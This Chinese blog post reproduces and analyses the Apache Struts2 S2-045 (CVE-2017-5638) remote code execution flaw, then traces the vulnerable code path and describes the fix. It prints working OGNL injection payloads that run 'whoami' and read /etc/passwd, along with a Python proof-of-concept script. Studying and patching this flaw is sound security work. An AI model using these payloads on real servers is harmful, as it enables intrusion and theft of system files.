前言
这是Struts系列第十二篇,继续加油!
Struts简介
Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架
漏洞复现
漏洞简介
S2-045漏洞,又名CVE-2017-5638漏洞
Struts2默认使用org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest 类对上传数据进行解析.JakartaMultiPartRequest类在处理Content-Type时如果获得非预期的值的话,将会抛出一个异常,对这个异常的处理会对错误信息进行OGNL表达式解析,从而造成了恶意代码执行.
漏洞成因
Struts2默认使用org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest 类对上传数据进行解析.JakartaMultiPartRequest类在处理Content-Type时如果获得非预期的值的话,将会抛出一个异常,对这个异常的处理会对错误信息进行OGNL表达式解析,从而造成了恶意代码执行.
漏洞影响范围
Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
环境搭建
使用IDEA直接打开源码地址中的对应文件,然后配置好Tomcat就可以运行了
Payload
执行命令
1
%{(#fuck='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
读取文件
1
%{(#fuck='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
POC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#!/usr/bin/env python3
import random
import string
import requests
class S2_045_BaseVerify:
def __init__(self, url):
self.info = {
'name': 'S2-045漏洞,又名CVE-2017-5638漏洞',
'description': 'Struts2 Remote Code Execution Vulnerability, Apache Struts 2.3.32之前的2.3.x版本, 2.5.10.1之前的2.5.x版本',
'date': '2017-03-02',
'type': 'RCE'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
self.capta = self.get_capta()
self.headers = dict()
self.headers['User-Agent'] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
self.payload = r'''%{(#fuck='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd_data').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}'''
def get_capta(self):
"""
获取一个随机字符串
:param:
:return str capta: 生成的字符串
"""
capta = ''
words = ''.join((string.ascii_letters,string.digits))
for i in range(8):
capta = capta + random.choice(words)
return capta
def run(self):
"""
检测是否存在漏洞
:param:
:return str True or False
"""
try:
self.check_payload = self.payload.replace('cmd_data', 'echo ' + self.capta)
self.headers['Content-Type'] = self.check_payload
check_req = requests.get(self.url, headers = self.headers)
if self.capta in check_req.text:
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
S2_045 = S2_045_BaseVerify('http://localhost:8080/s2_045_war_exploded/Upload.action')
print(S2_045.run())
漏洞分析
首先Struts2的运行流程是
1.HTTP请求经过一系列的标准过滤器(Filter)组件链(这些拦截器可以是Struts2 自带的,也可以是用户自定义的,本环境中struts.xml中的package继承自struts-default,struts-default就使用了Struts2自带的拦截器.ActionContextCleanUp主要是清理当前线程的ActionContext、Dispatcher,FilterDispatcher主要是通过ActionMapper来决定需要调用那个Action,FilterDispatcher是控制器的核心,也是MVC中控制层的核心组件),最后到达FilterDispatcher过滤器.
2.核心控制器组件FilterDispatcher根据ActionMapper中的设置确定是否需要调用某个Action组件来处理这个HttpServletRequest请求,如果ActionMapper决定调用某个Action组件,FilterDispatcher核心控制器组件就会把请求的处理权委托给ActionProxy组件.
3.ActionProxy组件通过Configuration Manager组件获取Struts2框架的配置文件struts.xml,最后找到需要调用的目标Action组件类,然后ActionProxy组件就创建出一个实现了命令模式的ActionInvocation类的对象实例类的对象实例(这个过程包括调用Anction组件本身之前调用多个的拦截器组件的before()方法)同时ActionInvocation组件通过代理模式调用目标Action组件.但是在调用之前ActionInvocation组件会根据配置文件中的设置项目加载与目标Action组件相关的所有拦截器组件(Interceptor)
4.一旦Action组件执行完毕,ActionInvocation组件将根据开发人员在Struts2.xml配置文件中定义的各个配置项目获得对象的返回结果,这个返回结果是这个Action组件的结果码(比如SUCCESS、INPUT),然后根据返回的该结果调用目标JSP页面以实现显示输出.
5.最后各个拦截器组件会被再次执行(但是顺序和开始时相反,并调用after()方法),然后请求最终被返回给系统的部署文件中配置的其他过滤器,如果已经设置了ActionContextCleanUp过滤器,那么FilterDispatcher就不会清理在ThreadLocal对象中保存的ActionContext信息.如果没有设置ActionContextCleanUp过滤器,FilterDispatcher就会清除掉所有的ThreadLocal对象.
具体分析过程:
1.Struts 2.3.5 - Struts 2.3.31、Struts 2.5 - Struts 2.5.10这二个范围的漏洞触发点不一样,本漏洞分析环境是2.3.24,是前者.就不对后者范围版本进行漏洞分析了,后者版本漏洞分析可参考这个参考地址
2.首先在lib/struts2-core-2.2.3.jar/org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter中dofilter方法第71行打断点,this.prepare.wrapRequest会封装request对象,F7进入this.prepare.wrapRequest方法
3.继续F7进入this.dispatcher.wrapRequest方法,这个方法首先获取Content-Type字段的值,然后判断这个值是否为空和是否含有字符串multipart/form-data,如果含有的话,构造ultiPartRequestWrapper对象.所以我们的payload需要含有multipart/form-data字符串,这样才能继续走下去.
4.F7进入MultiPartRequestWrapper方法.parser用来指定不同的解析类,从前面已经获取了multi为JakartaMultiPartRequest类型,所以会进入JakartaMultiPartRequest类的parse方法.F7跟入parse方法.
5.parse方法对处理上传文件时的操作this.processUpload(request, saveDir)进行try catch操作,因为Content-Type字段的值解析失败,所以流程会到处理异常的语句块.F7进入buildErrorMessage方法
6.buildErrorMessage方法会调用LocalizedTextUtil.findText对错误信息进行处理,F7继续进入LocalizedTextUtil.findText方法.
7.F7继续进入调用的重载findText方法,F7继续进入getDefaultMessage方法
8.会发现getDefaultMessage调用了老朋友TextParseUtil.translateVariables方法对错误信息进行ongl表达式处理.一直F7找到具体的translateVariables方法.
9.会首先进行parser.evalvate操作,这里创建TextParser对象并调用其evaluate,F7跟进去,在第56行执行表达式,F7跟进去.
10.返回到translateVariables方法,继续执行,会通过stack.findValue查找值栈,找到执行的结果.
漏洞修复
出错后,不把错误信息传入到LocalizedTextUtil.findText方法中去,content-type的值就不会进行OGNL表达式解析.
1
2
3
4
5
if (LocalizedTextUtil.findText(this.getClass(), errorKey, defaultLocale, null, new Object[0]) == null) {
return LocalizedTextUtil.findText(this.getClass(), "struts.messages.error.uploading", defaultLocale, null, new Object[] { e.getMessage() });
} else {
return LocalizedTextUtil.findText(this.getClass(), errorKey, defaultLocale, null, args);
}
总结
这次漏洞还真是奇怪,首先会把错误的信息作为ongl表达式进行执行,并且还会贴心的去掉无用信息……
挖Struts漏洞感觉深入跟进translateVariables方法就行了.
参考
https://mp.weixin.qq.com/s/0uY7luyJIj1sZMclrNBcoA
https://xz.aliyun.com/t/2712#toc-2
https://cwiki.apache.org/confluence/display/WW/S2-045
https://github.com/vulhub/vulhub/blob/master/struts2/s2-045/README.zh-cn.md
